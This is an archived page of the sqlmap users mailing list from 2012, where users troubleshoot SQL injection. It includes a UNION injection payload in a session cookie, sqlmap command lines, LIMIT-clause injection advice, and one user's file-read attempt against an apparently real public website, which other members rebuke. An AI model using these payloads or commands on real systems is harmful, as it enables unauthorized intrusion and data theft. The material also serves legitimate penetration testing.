sqlmap-users Mailing List for sqlmap (Page 50)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Stephen S. <ss...@ss...> - 2012-09-16 19:33:57
|
Hi,
This is the HTML from a manual request with sesh cookie set
to ')%20UNION%20select%201,2,3,4%20--%20
<html>
<head>
<link rel='stylesheet' href='css/styles.css'/>
<title>My Account - Customer Care Centre - Acme Power Co</title>
</head>
<body>
<div id='heading'>
</div>
<div id='menu'>
<a href='index.php'>Home / Login</a> -
<a href='account.php'>My Account</a> -
<a href='support.php'>Contact Support</a> -
<a href='#'
onClick='javascript:window.open("hours.php?data=ccc","newwin","width=210,height=200")'>CCC
Opening Hours</a> -
<a href='logout.php'>Logout</a>;
</div>
<div id='content'>
<div id='billz'>
Hi, 2!<br><br> Have a token: 86a2aeef8813bfa37a354e8997c77388<br><br>Please
find below your account statement, released 04 November 2011. This account
is due to be paid on <b>05 November 2011</b>. Failure to pay this amount
before the due date may result in service disruption.<br><br><h3>Account
Statement</h3><hr><table><tr><td width=200>Account Number</td><td
width=450>Description of
Service</td><td>Amount</td></tr></table><hr><table><tr><td
width=200>1</td><td width=450>Basic Power
Service</td><td>4</td></tr></table>
</div>
</div>
</body>
</html>
---------------------------
The relevant bits being "Hi, 2", and the table showing amount of "4" etc.
Thanks,
ss23
On Mon, Sep 17, 2012 at 6:58 AM, Miroslav Stampar <
mir...@gm...> wrote:
> Hi Stephen.
>
> From this traffic file it's not really clear if this is exploitable by any
> mean more than time-based.
>
> Could you please send the response you get when you "manually exploit" it
> with the payload you've mentioned:
> "sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
>
> Kind regards,
> Miroslav Stampar
>
>
> On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <ss...@ss...>wrote:
>
>> It ran a little over and started testing User-Agent, but it has the
>> entire log for the session cookie there.
>> The options I used this time were:
>> python2 sqlmap.py -u "http://10.100.0.26/account.php" --cookie="sesh=1"
>> -t traffic.txt --level=5
>>
>> Thanks,
>> ss23
>>
>>
>> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <
>> mir...@gm...> wrote:
>>
>>> Hi.
>>>
>>> In that case could you please send the sqlmap traffic file got by using
>>> -t traffic.txt along with your standard switches/options?
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>>
>>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon <ss...@ss...>wrote:
>>>
>>>> Hi,
>>>>
>>>> Sorry, my mistake. I just copied the line and altered it to show that
>>>> the cookie was being used. In the real script, there was no parse error.
>>>> Nonetheless, sqlmap cannot pull out results.
>>>>
>>>> Thanks
>>>> ss23
>>>>
>>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <
>>>> mir...@gm...> wrote:
>>>>
>>>>> Hi.
>>>>>
>>>>> I am not sure how are you able to "definitely able to pull out
>>>>> results" as as I can see the problem lies in used PHP (enclosed pair of
>>>>> single quotes with another pair of single quotes):
>>>>>
>>>>> Bad:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = *'$_COOKIE['sesh']'*)");
>>>>>
>>>>> Good 1:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = *'$_COOKIE[sesh]'*)");
>>>>>
>>>>> Good 2:
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = " . *$_COOKIE['sesh'] . "*)");
>>>>>
>>>>> With that code of yours you should get an ugly PHP error message:
>>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>>
>>>>> Also, you could take a look at similar case here [1].
>>>>>
>>>>> Kind regards,
>>>>> Miroslav Stampar
>>>>>
>>>>> [1]
>>>>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>>
>>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...>wrote:
>>>>>
>>>>>> Hi all,
>>>>>>
>>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>>> coax it into getting it right.
>>>>>> The PHP source looks something like:
>>>>>>
>>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>>
>>>>>> and then it displays the fields it pulled out.
>>>>>>
>>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>>> --risk=5. However, the only injection point it finds is AND/OR time-based
>>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>>> I'm definitely able to pull out results.
>>>>>>
>>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>>
>>>>>> Thanks,
>>>>>> ss23
>>>>>>
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> Got visibility?
>>>>>> Most devs has no idea what their production app looks like.
>>>>>> Find out how fast your code is with AppDynamics Lite.
>>>>>> http://ad.doubleclick.net/clk;262219671;13503038;y?
>>>>>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>>>
>>>>
>>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
|
|
From: Miroslav S. <mir...@gm...> - 2012-09-16 18:58:29
|
Hi Stephen.
>From this traffic file it's not really clear if this is exploitable by any
mean more than time-based.
Could you please send the response you get when you "manually exploit" it
with the payload you've mentioned:
"sesh=')%20UNION%20select%201,2,3,4%20--%20" ?
Kind regards,
Miroslav Stampar
On Sat, Sep 15, 2012 at 1:33 AM, Stephen Shkardoon <ss...@ss...>wrote:
> It ran a little over and started testing User-Agent, but it has the entire
> log for the session cookie there.
> The options I used this time were:
> python2 sqlmap.py -u "http://10.100.0.26/account.php" --cookie="sesh=1"
> -t traffic.txt --level=5
>
> Thanks,
> ss23
>
>
> On Sat, Sep 15, 2012 at 10:31 AM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> Hi.
>>
>> In that case could you please send the sqlmap traffic file got by using
>> -t traffic.txt along with your standard switches/options?
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon <ss...@ss...>wrote:
>>
>>> Hi,
>>>
>>> Sorry, my mistake. I just copied the line and altered it to show that
>>> the cookie was being used. In the real script, there was no parse error.
>>> Nonetheless, sqlmap cannot pull out results.
>>>
>>> Thanks
>>> ss23
>>>
>>> On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar <
>>> mir...@gm...> wrote:
>>>
>>>> Hi.
>>>>
>>>> I am not sure how are you able to "definitely able to pull out results"
>>>> as as I can see the problem lies in used PHP (enclosed pair of single
>>>> quotes with another pair of single quotes):
>>>>
>>>> Bad:
>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>> sessionid = *'$_COOKIE['sesh']'*)");
>>>>
>>>> Good 1:
>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>> sessionid = *'$_COOKIE[sesh]'*)");
>>>>
>>>> Good 2:
>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>> sessionid = " . *$_COOKIE['sesh'] . "*)");
>>>>
>>>> With that code of yours you should get an ugly PHP error message:
>>>> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE,
>>>> expecting T_STRING or T_VARIABLE or T_NUM_STRING"
>>>>
>>>> Also, you could take a look at similar case here [1].
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> [1]
>>>> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html
>>>>
>>>> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...>wrote:
>>>>
>>>>> Hi all,
>>>>>
>>>>> Trying to do a (simple) injection with sqlmap, and I can't seem to
>>>>> coax it into getting it right.
>>>>> The PHP source looks something like:
>>>>>
>>>>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
>>>>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
>>>>> sessionid = '$_COOKIE['sesh']')");
>>>>>
>>>>> and then it displays the fields it pulled out.
>>>>>
>>>>> The command(s) I've tried look something like ./sqlmap.py -u
>>>>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
>>>>> --risk=5. However, the only injection point it finds is AND/OR time-based
>>>>> blind, which is horribly slow. Of course, manually, I can do a
>>>>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
>>>>> I'm definitely able to pull out results.
>>>>>
>>>>> Anything I can do to push sqlmap in the right direction?
>>>>>
>>>>> Thanks,
>>>>> ss23
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> Got visibility?
>>>>> Most devs has no idea what their production app looks like.
>>>>> Find out how fast your code is with AppDynamics Lite.
>>>>> http://ad.doubleclick.net/clk;262219671;13503038;y?
>>>>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
|
From: Andres F. <an...@an...> - 2012-09-15 00:15:09
|
-- Andres Ferraro On Friday, September 14, 2012 at 6:33 PM, sql...@li... wrote: > Send sqlmap-users mailing list submissions to > sql...@li... > > To subscribe or unsubscribe via the World Wide Web, visit > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > or, via email, send a message with subject or body 'help' to > sql...@li... > > You can reach the person managing the list at > sql...@li... > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of sqlmap-users digest..." > > > Today's Topics: > > 1. TypeError: argument of type 'NoneType' is not iterable (M Zverev) > 2. Re: TypeError: argument of type 'NoneType' is not iterable > (Miroslav Stampar) > 3. Help read file (Jorge Vespa) > 4. Re: Help read file (Dennis) > 5. Re: Help read file (Miroslav Stampar) > 6. Disable output coloring (M Zverev) > 7. Injecting into LIMIT ints (Chris Oakley) > 8. Re: Injecting into LIMIT ints (Miroslav Stampar) > 9. sqlmap error (D Atkin) > 10. Re: Injecting into LIMIT ints (Chris Oakley) > 11. MemoryError (Happy User) > 12. Re: sqlmap error (Miroslav Stampar) > 13. Re: MemoryError (Miroslav Stampar) > 14. Re: Disable output coloring (Peter Thomas) > 15. Re: Disable output coloring (Miroslav Stampar) > 16. Re: Disable output coloring (Peter Thomas) > 17. ask error in sqlmap (muhammad husaini harun) > 18. Re: ask error in sqlmap (Brandon Perry) > 19. tag FORM not supported (Marco Mirandola) > 20. Re: tag FORM not supported (Timon Wang) > 21. Re: tag FORM not supported (Miroslav Stampar) > 22. Re: tag FORM not supported (Marco Mirandola) > 23. Re: tag FORM not supported (Chris Oakley) > 24. Re: tag FORM not supported (Miroslav Stampar) > 25. Rieqy Erysya (root rieqy) > 26. Re: Rieqy Erysya (Miroslav Stampar) > 27. Anyone having trouble with --eval? (Sergio Molina) > 28. UnicodeEncodeError: 'ascii' codec can't encode characters in > position 32-47: ordinal not in range(128) (Happy User) > 29. Re: UnicodeEncodeError: 'ascii' codec can't encode characters > in position 32-47: ordinal not in range(128) (Miroslav Stampar) > 30. Re: Anyone having trouble with --eval? (Miroslav Stampar) > 31. Two problems with sqlmap (Duarte Silva) > 32. freebsd9.0/unhandled exception in sqlmap/0.9 (milong mao) > 33. Re: freebsd9.0/unhandled exception in sqlmap/0.9 > (Miroslav Stampar) > 34. Melhorar o scan (Roberto Neves) > 35. Re: Melhorar o scan (Andr? Silva) > 36. Re: Melhorar o scan (du...@al...) > 37. Re: Melhorar o scan (James) > 38. Re: Two problems with sqlmap (Miroslav Stampar) > 39. Re: Two problems with sqlmap (Duarte Silva) > 40. Re: Two problems with sqlmap (Miroslav Stampar) > 41. Re: Two problems with sqlmap (Duarte Silva) > 42. Bypassing IDS/IPS (Arturs Pavlovs) > 43. Re: Bypassing IDS/IPS (du...@al...) > 44. Re: Bypassing IDS/IPS (Chris Oakley) > 45. Problem with multiple target mode (David London) > 46. Re: Problem with multiple target mode (Miroslav Stampar) > 47. unhandled exception (el draco) > 48. Re: unhandled exception (Miroslav Stampar) > 49. Re: unhandled exception (Andr? Silva) > 50. Re: unhandled exception (Miroslav Stampar) > 51. wrong file size checking with os-shell (Robin Wood) > 52. Re: wrong file size checking with os-shell (Miroslav Stampar) > 53. Re: wrong file size checking with os-shell (Robin Wood) > 54. Simple failed injection (Stephen Shkardoon) > 55. Re: Simple failed injection (Miroslav Stampar) > 56. Re: Simple failed injection (Stephen Shkardoon) > 57. Re: Simple failed injection (Miroslav Stampar) > 58. Re: Simple failed injection (Stephen Shkardoon) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Sat, 28 Jul 2012 15:33:18 +0400 > From: M Zverev <rob...@gm...> > Subject: [sqlmap-users] TypeError: argument of type 'NoneType' is not > iterable > To: sql...@li... > Message-ID: <501...@gm...> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > [15:12:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev-dba0a96, > retry your run with the latest development version from the G > itHub repository. If the exception persists, please send by e-mail to > 'sql...@li...' or open a new issue at > 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following > text and any information required to reproduce the bug. Th > e developers will try to reproduce the bug, fix it accordingly and get > back to you. > sqlmap version: 1.0-dev-dba0a96 > Python version: 2.7.3 > Operating system: nt > Command line: d:\Soft\sqlmap-dev\sqlmap.py -c x --dbs -u > *************************************** -D ****** -T *********** --dump > Technique: UNION > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "d:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main > start() > File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 571, in > start > action() > File "d:\Soft\sqlmap-dev\lib\controller\action.py", line 110, in action > conf.dbmsHandler.dumpTable() > File "d:\Soft\sqlmap-dev\plugins\generic\enumeration.py", line 1634, > in dumpTable > entries = inject.getValue(query, blind=False, dump=True) > File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 400, in getValue > value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL > else query, unpack, dump) > File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 354, in __goInband > output = unionUse(expression, unpack=unpack, dump=dump) > File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 345, in > unionUse > value = __oneShotUnionUse(expression, unpack) > File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 83, in > __oneShotUnionUse > if kb.chars.stop not in page and kb.chars.stop[:-1] in page: > TypeError: argument of type 'NoneType' is not iterable > > > > ------------------------------ > > Message: 2 > Date: Sun, 29 Jul 2012 17:34:42 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] TypeError: argument of type 'NoneType' is > not iterable > To: M Zverev <rob...@gm...> > Cc: sql...@li... > Message-ID: > <CA+9yoX16=+4P...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi. > > Thank you for your report and find it fixed with the latest commit [1]. > > Kind regards, > Miroslav Stampar > > [1] https://github.com/sqlmapproject/sqlmap/issues/126 > > On Sat, Jul 28, 2012 at 1:33 PM, M Zverev <rob...@gm...> wrote: > > > [15:12:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev-dba0a96, > > retry your run with the latest development version from the G > > itHub repository. If the exception persists, please send by e-mail to > > 'sql...@li...' or open a new issue at > > 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following > > text and any information required to reproduce the bug. Th > > e developers will try to reproduce the bug, fix it accordingly and get > > back to you. > > sqlmap version: 1.0-dev-dba0a96 > > Python version: 2.7.3 > > Operating system: nt > > Command line: d:\Soft\sqlmap-dev\sqlmap.py -c x --dbs -u > > *************************************** -D ****** -T *********** --dump > > Technique: UNION > > Back-end DBMS: MySQL (fingerprinted) > > Traceback (most recent call last): > > File "d:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main > > start() > > File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 571, in > > start > > action() > > File "d:\Soft\sqlmap-dev\lib\controller\action.py", line 110, in action > > conf.dbmsHandler.dumpTable() > > File "d:\Soft\sqlmap-dev\plugins\generic\enumeration.py", line 1634, > > in dumpTable > > entries = inject.getValue(query, blind=False, dump=True) > > File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 400, in getValue > > value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL > > else query, unpack, dump) > > File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 354, in __goInband > > output = unionUse(expression, unpack=unpack, dump=dump) > > File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 345, in > > unionUse > > value = __oneShotUnionUse(expression, unpack) > > File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 83, in > > __oneShotUnionUse > > if kb.chars.stop not in page and kb.chars.stop[:-1] in page: > > TypeError: argument of type 'NoneType' is not iterable > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 3 > Date: Sun, 29 Jul 2012 22:51:49 -0400 > From: "Jorge Vespa" <jv...@co...> > Subject: [sqlmap-users] Help read file > To: <sql...@li...> > Message-ID: <080501cd6dfe$43f6f030$cbe4d090$@com.bo> > Content-Type: text/plain; charset="us-ascii" > > Hi, great tool. > > > I could never read or write a file on the server, I don't know why. > > > For example this vulnerable web: > > > python sqlmap.py -u "http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL" > --file-read "/www/redpat.tv/htdocs/php/multimedia/p3.php" -v 5 > > > It return the error: /www/redpat.tv/htdocs/php/multimedia/p3.php file saved > to: 'None' > > > If you go to: > > http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL' > > you can see selecting to see the text, that the path on the server is right, > thanks to the error message. > > > Hope you can help me, thanks. > > > > Jorge Vespa > COTASnet > 3862818 > Santa Cruz - Bolivia > > > > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 4 > Date: Mon, 30 Jul 2012 08:59:48 +0200 > From: Dennis <kor...@ya...> > Subject: Re: [sqlmap-users] Help read file > To: Jorge Vespa <jv...@co...> > Cc: sql...@li... > Message-ID: <501...@ya...> > Content-Type: text/plain; charset=ISO-8859-1 > > Hi Jorge, > > please do not post any vulnerabilities of real web pages to the mailing > list. Could get you or anyone replying into trouble. > > Cheers, > Dennis > > > > ------------------------------ > > Message: 5 > Date: Mon, 30 Jul 2012 13:14:32 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] Help read file > To: Dennis <kor...@ya...> > Cc: sql...@li... > Message-ID: > <CA+9yoX0+U7U2Bt8qNv9sNXmRGtgbXtYNifHsy-Z5=CeV...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi Jorge. > > Dennis is right. Posting real targets on this ML is considered as an > inappropriate. > > In your case you are most probably having problems with backend DBMS > permissions as in majority of similar cases. > > In such cases switches -t and/or --parse-errors are great for debugging > purposes. > > Kind regards, > Miroslav Stampar > > On Mon, Jul 30, 2012 at 8:59 AM, Dennis <kor...@ya...> wrote: > > > Hi Jorge, > > > > please do not post any vulnerabilities of real web pages to the mailing > > list. Could get you or anyone replying into trouble. > > > > Cheers, > > Dennis > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 6 > Date: Thu, 02 Aug 2012 15:17:44 +0400 > From: M Zverev <rob...@gm...> > Subject: [sqlmap-users] Disable output coloring > To: sql...@li... > Message-ID: <501...@gm...> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > I often redirect sqlmap output to a text file with the command >, and > that leave annoying marks like > [0m > [31m > at the beginning and the end of lines, and I have to clean that out. > Is there a way to disable output coloring? > > > > ------------------------------ > > Message: 7 > Date: Fri, 3 Aug 2012 15:08:32 +0100 > From: Chris Oakley <chr...@gm...> > Subject: [sqlmap-users] Injecting into LIMIT ints > To: sql...@li... > Message-ID: > <CAF6VE=pnf...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi All > > I have found that an application has a rewritten URL element that ends up > in a SQL query. The error message tells me that I'm injecting into the > LIMIT number at the end of the query. This appears to be the only point of > injection for now. > > A simplified version of the query that's being injected into is: > > SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC, > created_date DESC LIMIT foo, 10 > > 'foo' is my injection and of course gives a syntax error. > > I know that apostrophes/ticks (as in the ' character) are blocked as a > minimum. > > Does anyone have any experience injecting this late in a query? Any ideas > would be greatly received. > > Regards > > Chris > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 8 > Date: Fri, 3 Aug 2012 17:15:05 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] Injecting into LIMIT ints > To: Chris Oakley <chr...@gm...> > Cc: sql...@li... > Message-ID: > <CA+...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi Chris. > > In those kind of cases UNION injection should be a solution. > > As LIMIT doesn't accept subquery as an operand you have to append a UNION > ALL SELECT to the original value (foo in your case) and necessarily add a > comment to the end (e.g. --) to neutralize that second operand of affected > LIMIT part. > > To make it short, LIMIT doesn't accept subqueries and standard non-UNION > based injection techniques should fail (as they "seed" their payload into > the affected SQL form - in this case LIMIT). > > Kind regards, > Miroslav Stampar > > On Fri, Aug 3, 2012 at 4:08 PM, Chris Oakley > <chr...@gm...>wrote: > > > Hi All > > > > I have found that an application has a rewritten URL element that ends up > > in a SQL query. The error message tells me that I'm injecting into the > > LIMIT number at the end of the query. This appears to be the only point of > > injection for now. > > > > A simplified version of the query that's being injected into is: > > > > SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC, > > created_date DESC LIMIT foo, 10 > > > > 'foo' is my injection and of course gives a syntax error. > > > > I know that apostrophes/ticks (as in the ' character) are blocked as a > > minimum. > > > > Does anyone have any experience injecting this late in a query? Any ideas > > would be greatly received. > > > > Regards > > > > Chris > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 9 > Date: Fri, 3 Aug 2012 16:37:19 +0000 > From: D Atkin <je...@ho...> > Subject: [sqlmap-users] sqlmap error > To: <sql...@li...> > Message-ID: <COL...@ph...l> > Content-Type: text/plain; charset="windows-1256" > > > hi > > im try to run sqlmap from msf but i keep getting this error > > the sqlmap script could not be found: > > iv already had sqlmap path to system Path envirounment put im still getting this error. > > can u tell me what i can do from here. > > Thank you! > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 10 > Date: Fri, 3 Aug 2012 17:37:22 +0100 > From: Chris Oakley <chr...@gm...> > Subject: Re: [sqlmap-users] Injecting into LIMIT ints > To: Miroslav Stampar <mir...@gm...> > Cc: sql...@li... > Message-ID: > <CAF6VE=pT7...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Thanks Miroslav, I'll give it a go! > > On 3 August 2012 16:15, Miroslav Stampar <mir...@gm...> wrote: > > > Hi Chris. > > > > In those kind of cases UNION injection should be a solution. > > > > As LIMIT doesn't accept subquery as an operand you have to append a UNION > > ALL SELECT to the original value (foo in your case) and necessarily add a > > comment to the end (e.g. --) to neutralize that second operand of affected > > LIMIT part. > > > > To make it short, LIMIT doesn't accept subqueries and standard non-UNION > > based injection techniques should fail (as they "seed" their payload into > > the affected SQL form - in this case LIMIT). > > > > Kind regards, > > Miroslav Stampar > > > > On Fri, Aug 3, 2012 at 4:08 PM, Chris Oakley <chr...@gm... > > > wrote: > > > > > > > Hi All > > > > > > I have found that an application has a rewritten URL element that ends up > > > in a SQL query. The error message tells me that I'm injecting into the > > > LIMIT number at the end of the query. This appears to be the only point of > > > injection for now. > > > > > > A simplified version of the query that's being injected into is: > > > > > > SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC, > > > created_date DESC LIMIT foo, 10 > > > > > > 'foo' is my injection and of course gives a syntax error. > > > > > > I know that apostrophes/ticks (as in the ' character) are blocked as a > > > minimum. > > > > > > Does anyone have any experience injecting this late in a query? Any > > > ideas would be greatly received. > > > > > > Regards > > > > > > Chris > > > > > > > > > ------------------------------------------------------------------------------ > > > Live Security Virtual Conference > > > Exclusive live event will cover all the ways today's security and > > > threat landscape has changed and how IT managers can respond. Discussions > > > will include endpoint security, mobile security and the latest in malware > > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > _______________________________________________ > > > sqlmap-users mailing list > > > sql...@li... > > > 